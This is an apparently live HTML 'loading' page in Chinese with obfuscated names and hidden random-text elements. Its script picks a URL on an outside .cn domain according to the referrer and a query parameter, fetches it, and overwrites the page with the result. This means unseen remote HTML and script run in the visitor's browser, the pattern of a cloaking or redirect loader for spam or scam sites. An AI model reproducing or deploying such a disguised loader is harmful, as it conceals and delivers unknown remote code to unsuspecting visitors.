<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .cmKMqS5DSW {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .cmKMqS5DSW .AIYaqEG {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .cmKMqS5DSW .content {
            line-height: 50px;
            text-align: center
        }

        .cmKMqS5DSW .img {
            width: 100%
        }

        .cmKMqS5DSW .hU8D21n {
            text-align: center
        }

        .cmKMqS5DSW .hU8D21n span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .cmKMqS5DSW .hU8D21n span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .cmKMqS5DSW .hU8D21n span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .cmKMqS5DSW .hU8D21n span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .cmKMqS5DSW .hU8D21n span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .cmKMqS5DSW .hU8D21n span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .cmKMqS5DSW .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function jDle1jl9t(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var DR3tc = jDle1jl9t('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ DR3tc +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ DR3tc +".html?a=share";
		}
		
        EoEkgABdl2=url+"#"+new Date().getTime();
        EoEkgABdl2 && function() {
            $.get(EoEkgABdl2, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>JPkM3wkt0xTbnp9RsTWUffMiF2eF</p>
<h1 style='display:none' >zHs2uf0hMNhp2zGT4k2uhMeoigo3OcJk8ZeMFgmDLfoWyhZ3EkhNTpNG6uLZWSw1Y9QIigMi4WjVbhUcFndT</h1>
<li style='display:none' >fBpfc0NDt14ijifxlbmDOTPkfEKe9CbbEZZPEMNAeMe0E0s23YbsHgZBkrhi</li>
<li style='display:none' >fBpfc0NDt14ijifxlbmDOTPkfEKe9CbbEZZPEMNAeMe0E0s23YbsHgZBkrhi</li>
<h1 style='display:none' >zHs2uf0hMNhp2zGT4k2uhMeoigo3OcJk8ZeMFgmDLfoWyhZ3EkhNTpNG6uLZWSw1Y9QIigMi4WjVbhUcFndT</h1>
<div style='display:none'>lij6KwsLidnllKMbmSwMql4ERrF9zjtQsVALLZ5fXJabWcIzl4AAFOZkJYgDohnJ3bWexUOXrlj0JMhoJtDOlNE7TlVAUS1VL</div><div class="cmKMqS5DSW">
    <div class="AIYaqEG">
        <div class="hU8D21n">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>RrMulhhFzjqArJs0ifQSte0DVq8</a>
<img  src='' style='display:none'>
<p  style='display:none'>fQtRlQJbPwmZsTHvrFGgOz7Ga38pOLl3yj3MJZtfMK</p>
<ul style='display:none' >MZs3VCmU638KV4koCtUdVw5ti4wIr0PtoGJZp</ul>
<p  style='display:none'>fQtRlQJbPwmZsTHvrFGgOz7Ga38pOLl3yj3MJZtfMK</p>
<ul style='display:none' >MZs3VCmU638KV4koCtUdVw5ti4wIr0PtoGJZp</ul></body>
</html>